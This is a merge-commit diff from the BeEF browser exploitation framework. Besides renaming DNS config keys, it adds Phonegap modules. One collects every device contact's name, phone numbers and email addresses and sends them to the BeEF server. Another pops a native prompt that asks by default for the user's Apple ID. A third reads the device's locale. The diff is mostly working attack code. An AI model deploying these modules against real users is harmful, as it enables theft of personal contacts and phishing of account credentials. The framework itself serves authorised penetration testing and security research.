Merge branch 'master' of https://github.com/beefproject/beef

config.yaml

@@ -27,7 +27,9 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
@@ -56,7 +58,7 @@ beef:
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 

core/main/client/browser.js

@@ -1082,8 +1082,9 @@ beef.browser = {
      */
     hasPhonegap:function () {
         var result = false;
+        
         try {
-            if (!!device.phonegap) result = true; else result = false;
+            if (!!device.phonegap || !!device.cordova) result = true; else result = false;
         }
         catch (e) {
             result = false;

core/main/server.rb

@@ -41,7 +41,8 @@ module BeEF
             'beef_port'     => @configuration.get('beef.http.port'),
             'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
             'beef_hook'     => @configuration.get('beef.http.hook_file'),
             'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
             'client_debug'  => @configuration.get("beef.client.debug")

modules/phonegap/phonegap_detect/command.js

@@ -17,7 +17,8 @@ beef.execute(function() {
         + " cordova api: " + device.cordova
         + " platform: " + device.platform
         + " uuid: " + device.uuid
-        + " version: " + device.version;
+        + " version: " + device.version
+	+ " model: " + device.model;
     } catch(e) {
         phonegap_details = "unable to detect phonegap";
     }

modules/phonegap/phonegap_globalization_status/command.js

@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_globalization_status
+//
+beef.execute(function() {
+    var result = '';
+
+    navigator.globalization.getPreferredLanguage(
+  		function (language) {
+  			result = 'language: ' + language.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}, 
+  		function () {
+  			result = 'language: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+
+    navigator.globalization.getLocaleName(
+  		function (locale) {
+  			result = 'locale: ' + locale.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		},
+  		function () {
+  			result = 'locale: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+    
+});

modules/phonegap/phonegap_globalization_status/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_globalization_status
+#
+beef:
+    module:
+        phonegap_globalization_status:
+            enable: true
+            category: "Phonegap"
+            name: "Globalization Status"
+            description: "Examine device local settings"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_globalization_status/module.rb

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // Phonegap_globalization_status
+
+class Phonegap_globalization_status < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_list_contacts/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_list_contacts
+//
+beef.execute(function() {
+    var result = '';
+
+    function onSuccess(contacts) {
+
+         for (var i=0; i<contacts.length; i++) {
+            result = contacts[i].displayName;
+            
+            for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
+                result = result + ' #:' + contacts[i].phoneNumbers[j].value;
+            }
+
+            for (var j=0; j<contacts[i].emails.length; j++) {
+                result = result + ' @:' + contacts[i].emails[j].value;
+            }
+
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+
+        }
+    };
+
+    function onError(contactError) {
+        result = 'fail';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    };
+
+
+    var options = new ContactFindOptions();
+    options.filter="";
+    options.multiple=true; 
+    var fields = ["displayName", "phoneNumbers", "emails"];
+    
+    navigator.contacts.find(fields, onSuccess, onError, options);
+    
+});

modules/phonegap/phonegap_list_contacts/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap
+#
+beef:
+    module:
+        phonegap_list_contacts:
+            enable: true
+            category: "Phonegap"
+            name: "List Contacts"
+            description: "Examine device contacts."
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_list_contacts/module.rb

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_list_contacts
+
+class Phonegap_list_contacts < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_prompt_user/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_prompt_user
+//
+beef.execute(function() {
+    var title = "<%== @title %>";
+    var question = "<%== @question %>";
+    var ans_yes = "<%== @ans_yes %>";
+    var ans_no = "<%== @ans_no %>";
+    var result = '';
+
+   
+    function onPrompt(results) {
+        result = "Selected button number " + results.buttonIndex + " result: " + results.input1;
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+    }
+
+    navigator.notification.prompt(
+        question,
+        onPrompt,      
+        title,         
+        [ans_yes,ans_no]
+    );
+  
+});

modules/phonegap/phonegap_prompt_user/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_prompt_user
+#
+beef:
+    module:
+        phonegap_prompt_user:
+            enable: true
+            category: "Phonegap"
+            name: "Prompt User"
+            description: "Ask device user a question"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_prompt_user/module.rb

@@ -0,0 +1,46 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_prompt_user
+#
+
+class Phonegap_prompt_user < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'title', 
+            'description' => 'Prompt title', 
+            'ui_label'=>'Title', 
+            'value' => 'Apple ID',
+            'width' => '300px'
+            
+            },{
+            'name' => 'question', 
+            'description' => 'Prompt question', 
+            'ui_label'=>'Question', 
+            'value' => 'Please enter your Apple ID',
+            'width' => '300px'
+            },{
+            'name' => 'ans_yes', 
+            'description' => 'Prompt positive answer button label', 
+            'ui_label'=>'Yes', 
+            'value' => 'Submit',
+            'width' => '100px'
+            },{
+            'name' => 'ans_no', 
+            'description' => 'Prompt negative answer button label', 
+            'ui_label'=>'No', 
+            'value' => 'Cancel',
+            'width' => '100px'
+            }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end